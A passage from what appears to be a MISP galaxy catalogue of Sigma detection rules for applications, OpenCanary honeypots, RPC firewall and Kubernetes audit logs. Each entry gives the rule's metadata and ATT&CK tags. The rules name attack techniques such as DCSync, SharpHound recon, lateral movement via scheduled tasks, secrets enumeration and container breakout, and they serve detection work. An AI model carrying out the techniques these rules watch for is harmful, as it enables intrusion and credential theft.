falsepositive ["Puppeteer invocation exceptions often contain child_process related errors, that doesn't necessarily mean that the app is vulnerable."]
filename nodejs_rce_exploitation_attempt.yml
level high
logsource.category application
logsource.product nodejs
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Spring Framework Exceptions

Detects suspicious Spring framework exceptions that could indicate exploitation attempts

Internal MISP references

UUID ae48ab93-45f7-4051-9dfe-5d30a3f78e33 which can be used as unique global reference for Spring Framework Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/06
falsepositive ['Application bugs']
filename spring_application_exceptions.yml
level medium
logsource.category application
logsource.product spring
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Potential SpEL Injection In Spring Framework

Detects potential SpEL Injection exploitation, which may lead to RCE.

Internal MISP references

UUID e9edd087-89d8-48c9-b0b4-5b9bb10896b8 which can be used as unique global reference for Potential SpEL Injection In Spring Framework in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename spring_spel_injection.yml
level high
logsource.category application
logsource.product spring
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

OpenCanary - FTP Login Attempt

Detects instances where an FTP service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID 6991bc2b-ae2e-447f-bc55-3a1ba04c14e5 which can be used as unique global reference for OpenCanary - FTP Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ftp_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.exfiltration', 'attack.t1190', 'attack.t1021']
Related clusters

To see the related clusters, click here.

OpenCanary - Telnet Login Attempt

Detects instances where a Telnet service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID 512cff7a-683a-43ad-afe0-dd398e872f36 which can be used as unique global reference for OpenCanary - Telnet Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_telnet_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.command_and_control', 'attack.t1133', 'attack.t1078']
Related clusters

To see the related clusters, click here.

OpenCanary - SIP Request

Detects instances where an SIP service on an OpenCanary node has had a SIP request.

Internal MISP references

UUID e30de276-68ec-435c-ab99-ef3befec6c61 which can be used as unique global reference for OpenCanary - SIP Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_sip_request.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

OpenCanary - SMB File Open Request

Detects instances where an SMB service on an OpenCanary node has had a file open request.

Internal MISP references

UUID 22777c9e-873a-4b49-855f-6072ab861a52 which can be used as unique global reference for OpenCanary - SMB File Open Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_smb_file_open.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.lateral_movement', 'attack.collection', 'attack.t1021', 'attack.t1005']
Related clusters

To see the related clusters, click here.

OpenCanary - SSH Login Attempt

Detects instances where an SSH service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID ff7139bc-fdb1-4437-92f2-6afefe8884cb which can be used as unique global reference for OpenCanary - SSH Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ssh_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.lateral_movement', 'attack.persistence', 'attack.t1133', 'attack.t1021', 'attack.t1078']
Related clusters

To see the related clusters, click here.

OpenCanary - HTTPPROXY Login Attempt

Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.

Internal MISP references

UUID 5498fc09-adc6-4804-b9d9-5cca1f0b8760 which can be used as unique global reference for OpenCanary - HTTPPROXY Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_httpproxy_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.defense_evasion', 'attack.t1090']
Related clusters

To see the related clusters, click here.

OpenCanary - REDIS Action Command Attempt

Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.

Internal MISP references

UUID 547dfc53-ebf6-4afe-8d2e-793d9574975d which can be used as unique global reference for OpenCanary - REDIS Action Command Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_redis_command.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']
Related clusters

To see the related clusters, click here.

OpenCanary - VNC Connection Attempt

Detects instances where a VNC service on an OpenCanary node has had a connection attempt.

Internal MISP references

UUID 9db5446c-b44a-4291-8b89-fcab5609c3b3 which can be used as unique global reference for OpenCanary - VNC Connection Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_vnc_connection_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.lateral_movement', 'attack.t1021']
Related clusters

To see the related clusters, click here.

OpenCanary - SNMP OID Request

Detects instances where an SNMP service on an OpenCanary node has had an OID request.

Internal MISP references

UUID e9856028-fd4e-46e6-b3d1-10f7ceb95078 which can be used as unique global reference for OpenCanary - SNMP OID Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_snmp_cmd.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.discovery', 'attack.lateral_movement', 'attack.t1016', 'attack.t1021']
Related clusters

To see the related clusters, click here.

OpenCanary - HTTP POST Login Attempt

Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.

Internal MISP references

UUID af1ac430-df6b-4b38-b976-0b52f07a0252 which can be used as unique global reference for OpenCanary - HTTP POST Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_http_post_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

OpenCanary - GIT Clone Request

Detects instances where a GIT service on an OpenCanary node has had Git Clone request.

Internal MISP references

UUID 4fe17521-aef3-4e6a-9d6b-4a7c8de155a8 which can be used as unique global reference for OpenCanary - GIT Clone Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_git_clone_request.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.collection', 'attack.t1213']
Related clusters

To see the related clusters, click here.

OpenCanary - HTTP GET Request

Detects instances where an HTTP service on an OpenCanary node has received a GET request.

Internal MISP references

UUID af6c3078-84cd-4c68-8842-08b76bd81b13 which can be used as unique global reference for OpenCanary - HTTP GET Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_http_get.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

OpenCanary - MSSQL Login Attempt Via Windows Authentication

Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.

Internal MISP references

UUID 6e78f90f-0043-4a01-ac41-f97681613a66 which can be used as unique global reference for OpenCanary - MSSQL Login Attempt Via Windows Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_mssql_login_winauth.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']
Related clusters

To see the related clusters, click here.

OpenCanary - TFTP Request

Detects instances where a TFTP service on an OpenCanary node has had a request.

Internal MISP references

UUID b4e6b016-a2ac-4759-ad85-8000b300d61e which can be used as unique global reference for OpenCanary - TFTP Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_tftp_request.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.exfiltration', 'attack.t1041']
Related clusters

To see the related clusters, click here.

OpenCanary - MySQL Login Attempt

Detects instances where a MySQL service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID e7d79a1b-25ed-4956-bd56-bd344fa8fd06 which can be used as unique global reference for OpenCanary - MySQL Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_mysql_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']
Related clusters

To see the related clusters, click here.

OpenCanary - NTP Monlist Request

Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.

Internal MISP references

UUID 7cded4b3-f09e-405a-b96f-24248433ba44 which can be used as unique global reference for OpenCanary - NTP Monlist Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ntp_monlist.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.impact', 'attack.t1498']
Related clusters

To see the related clusters, click here.

OpenCanary - SSH New Connection Attempt

Detects instances where an SSH service on an OpenCanary node has had a connection attempt.

Internal MISP references

UUID cd55f721-5623-4663-bd9b-5229cab5237d which can be used as unique global reference for OpenCanary - SSH New Connection Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ssh_new_connection.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.lateral_movement', 'attack.persistence', 'attack.t1133', 'attack.t1021', 'attack.t1078']
Related clusters

To see the related clusters, click here.

OpenCanary - MSSQL Login Attempt Via SQLAuth

Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.

Internal MISP references

UUID 3ec9a16d-0b4f-4967-9542-ebf38ceac7dd which can be used as unique global reference for OpenCanary - MSSQL Login Attempt Via SQLAuth in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_mssql_login_sqlauth.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']
Related clusters

To see the related clusters, click here.

Python SQL Exceptions

Generic rule for SQL exceptions in Python according to PEP 249

Internal MISP references

UUID 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9 which can be used as unique global reference for Python SQL Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/12
falsepositive ['Application bugs']
filename app_python_sql_exceptions.yml
level medium
logsource.category application
logsource.product python
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Potential OGNL Injection Exploitation In JVM Based Application

Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)

Internal MISP references

UUID 4d0af518-828e-4a04-a751-a7d03f3046ad which can be used as unique global reference for Potential OGNL Injection Exploitation In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_ognl_injection_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190', 'cve.2017.5638', 'cve.2022.26134']
Related clusters

To see the related clusters, click here.

Potential Local File Read Vulnerability In JVM Based Application

Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.

Internal MISP references

UUID e032f5bc-4563-4096-ae3b-064bab588685 which can be used as unique global reference for Potential Local File Read Vulnerability In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_local_file_read.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Process Execution Error In JVM Based Application

Detects process execution related exceptions in JVM based apps, often relates to RCE

Internal MISP references

UUID d65f37da-a26a-48f8-8159-3dde96680ad2 which can be used as unique global reference for Process Execution Error In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_rce_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Potential XXE Exploitation Attempt In JVM Based Application

Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.

Internal MISP references

UUID c4e06896-e27c-4583-95ac-91ce2279345d which can be used as unique global reference for Potential XXE Exploitation Attempt In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ["If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE."]
filename java_xxe_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Potential JNDI Injection Exploitation In JVM Based Application

Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.

Internal MISP references

UUID bb0e9cec-d4da-46f5-997f-22efc59f3dca which can be used as unique global reference for Potential JNDI Injection Exploitation In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_jndi_injection_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Suspicious SQL Error Messages

Detects SQL error messages that indicate probing for an injection attack

Internal MISP references

UUID 8a670c6d-7189-4b1c-8017-a417ca84a086 which can be used as unique global reference for Suspicious SQL Error Messages in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bjoern Kimminich
creation_date 2017/11/27
falsepositive ['A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case.']
filename app_sqlinjection_errors.yml
level high
logsource.category application
logsource.product sql
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Ruby on Rails Framework Exceptions

Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts

Internal MISP references

UUID 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a which can be used as unique global reference for Ruby on Rails Framework Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/06
falsepositive ['Application bugs']
filename appframework_ruby_on_rails_exceptions.yml
level medium
logsource.category application
logsource.product ruby_on_rails
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

SharpHound Recon Account Discovery

Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.

Internal MISP references

UUID 65f77b1e-8e79-45bf-bb67-5988a8ce45a5 which can be used as unique global reference for SharpHound Recon Account Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sharphound_recon_account.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.t1087', 'attack.discovery']
Related clusters

To see the related clusters, click here.

Remote Registry Recon

Detects remote RPC calls to collect information

Internal MISP references

UUID d8ffe17e-04be-4886-beb9-c1dd1944b9a8 which can be used as unique global reference for Remote Registry Recon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Remote administration of registry values']
filename rpc_firewall_remote_registry_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Schedule Task Recon via ITaskSchedulerService

Detects remote RPC calls to read information about scheduled tasks

Internal MISP references

UUID 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e which can be used as unique global reference for Remote Schedule Task Recon via ITaskSchedulerService in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_itaskschedulerservice_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Server Service Abuse for Lateral Movement

Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR

Internal MISP references

UUID 10018e73-06ec-46ec-8107-9172f1e04ff2 which can be used as unique global reference for Remote Server Service Abuse for Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Administrative tasks on remote services']
filename rpc_firewall_remote_service_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Remote Schedule Task Lateral Movement via ATSvc

Detects remote RPC calls to create or execute a scheduled task via ATSvc

Internal MISP references

UUID 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb which can be used as unique global reference for Remote Schedule Task Lateral Movement via ATSvc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_atsvc_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1053', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Possible DCSync Attack

Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.

Internal MISP references

UUID 56fda488-113e-4ce9-8076-afc2457922c3 which can be used as unique global reference for Possible DCSync Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_dcsync_attack.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.t1033', 'attack.discovery']
Related clusters

To see the related clusters, click here.

Remote Event Log Recon

Detects remote RPC calls to get event log information via EVEN or EVEN6

Internal MISP references

UUID 2053961f-44c7-4a64-b62d-f6e72800af0d which can be used as unique global reference for Remote Event Log Recon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Remote administrative tasks on Windows Events']
filename rpc_firewall_eventlog_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Schedule Task Lateral Movement via ITaskSchedulerService

Detects remote RPC calls to create or execute a scheduled task

Internal MISP references

UUID ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d which can be used as unique global reference for Remote Schedule Task Lateral Movement via ITaskSchedulerService in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_itaskschedulerservice_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1053', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Remote DCOM/WMI Lateral Movement

Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.

Internal MISP references

UUID 68050b10-e477-4377-a99b-3721b422d6ef which can be used as unique global reference for Remote DCOM/WMI Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Some administrative tasks on remote host']
filename rpc_firewall_remote_dcom_or_wmi.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1021.003', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Remote Schedule Task Lateral Movement via SASec

Detects remote RPC calls to create or execute a scheduled task via SASec

Internal MISP references

UUID aff229ab-f8cd-447b-b215-084d11e79eb0 which can be used as unique global reference for Remote Schedule Task Lateral Movement via SASec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sasec_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1053', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Remote Printing Abuse for Lateral Movement

Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR

Internal MISP references

UUID bc3a4b0c-e167-48e1-aa88-b3020950e560 which can be used as unique global reference for Remote Printing Abuse for Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Actual printing']
filename rpc_firewall_printing_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement']

SharpHound Recon Sessions

Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.

Internal MISP references

UUID 6d580420-ff3f-4e0e-b6b0-41b90c787e28 which can be used as unique global reference for SharpHound Recon Sessions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sharphound_recon_sessions.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.t1033']
Related clusters

To see the related clusters, click here.

Remote Encrypting File System Abuse

Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR

Internal MISP references

UUID 5f92fff9-82e2-48eb-8fc1-8b133556a551 which can be used as unique global reference for Remote Encrypting File System Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Legitimate usage of remote file encryption']
filename rpc_firewall_efs_abuse.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement']

Recon Activity via SASec

Detects remote RPC calls to read information about scheduled tasks via SASec

Internal MISP references

UUID 0a3ff354-93fc-4273-8a03-1078782de5b7 which can be used as unique global reference for Recon Activity via SASec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sasec_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Registry Lateral Movement

Detects remote RPC calls to modify the registry and possible execute code

Internal MISP references

UUID 35c55673-84ca-4e99-8d09-e334f3c29539 which can be used as unique global reference for Remote Registry Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Remote administration of registry values']
filename rpc_firewall_remote_registry_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Remote Server Service Abuse

Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS

Internal MISP references

UUID b6ea3cc7-542f-43ef-bbe4-980fbed444c7 which can be used as unique global reference for Remote Server Service Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Legitimate remote share creation']
filename rpc_firewall_remote_server_service_abuse.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement']

Remote Schedule Task Recon via AtScv

Detects remote RPC calls to read information about scheduled tasks via AtScv

Internal MISP references

UUID f177f2bc-5f3e-4453-b599-57eefce9a59c which can be used as unique global reference for Remote Schedule Task Recon via AtScv in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_atsvc_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Potential Server Side Template Injection In Velocity

Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.

Internal MISP references

UUID 16c86189-b556-4ee8-b4c7-7e350a195a4f which can be used as unique global reference for Potential Server Side Template Injection In Velocity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs', 'Missing .vm files']
filename velocity_ssti_injection.yml
level high
logsource.category application
logsource.product velocity
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Privileged Container Deployed

Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields

Internal MISP references

UUID c5cd1b20-36bb-488d-8c05-486be3d0cb97 which can be used as unique global reference for Privileged Container Deployed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_privileged_pod_creation.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1611']
Related clusters

To see the related clusters, click here.

RBAC Permission Enumeration Attempt

Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.

Internal MISP references

UUID 84b777bd-c946-4d17-aa2e-c39f5a454325 which can be used as unique global reference for RBAC Permission Enumeration Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_rbac_permisions_listing.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1069.003', 'attack.t1087.004']
Related clusters

To see the related clusters, click here.

Kubernetes Secrets Enumeration

Detects enumeration of Kubernetes secrets.

Internal MISP references

UUID eeb3e9e1-b685-44e4-9232-6bb701f925b5 which can be used as unique global reference for Kubernetes Secrets Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret']
filename kubernetes_audit_secrets_enumeration.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1552.007']
Related clusters

To see the related clusters, click here.

Kubernetes Events Deleted

Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.

Internal MISP references

UUID 3132570d-cab2-4561-9ea6-1743644b2290 which can be used as unique global reference for Kubernetes Events Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_events_deleted.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1070']
Related clusters

To see the related clusters, click here.

Potential Sidecar Injection Into Running Deployment

Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.

Internal MISP references

UUID ad9012a6-e518-4432-9890-f3b82b8fc71f which can be used as unique global reference for Potential Sidecar Injection Into Running Deployment in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_sidecar_injection.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1609']
Related clusters

To see the related clusters, click here.

Deployment Deleted From Kubernetes Cluster

Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.

Internal MISP references

UUID 40967487-139b-4811-81d9-c9767a92aa5a which can be used as unique global reference for Deployment Deleted From Kubernetes Cluster in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_deployment_deleted.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1498']
Related clusters

To see the related clusters, click here.

